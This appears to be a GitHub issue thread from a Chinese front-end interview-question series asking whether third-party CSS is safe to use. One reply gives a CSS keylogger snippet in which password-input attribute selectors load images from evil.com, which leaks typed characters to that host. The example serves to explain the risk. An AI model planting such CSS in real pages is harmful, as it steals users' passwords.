### ISSUE TITLE
[css] 第857天 引用第三方的css安不安全？为什么？

### ISSUE THREAD

**Issue by haizhilin2013** [haizlin/fe-interview#4351]
第857天 引用第三方的css安不安全？为什么？

[3+1官网](http://www.h-camel.com/index.html)

[我也要出题](http://www.h-camel.com/contribution.html)

**Comment by ghostzhang** [comment]
阿里的 Ant Design 圣诞事件就是最好的案例
https://github.com/ant-design/ant-design/issues/13098

**Comment by wheatup** [comment]
不安全，比较著名的CSS Keylogger：

```css
input[type="password"][value*="a"] {
  background-image: url("https://evil.com/a");
}

input[type="password"][value*="b"] {
  background-image: url("https://evil.com/b");
}

/* ... */

input[type="password"][value*="z"] {
  background-image: url("https://evil.com/z");
}
```

该代码仅通过CSS便可以监听用户输入。

当用户输入密码时，用户输入的内容一旦匹配到对应的css规则，会向第三方网站 `https://evil.com` 发送对应的资源请求，服务器通过请求的顺序记录下用户输入的密码，造成用户密码泄露。
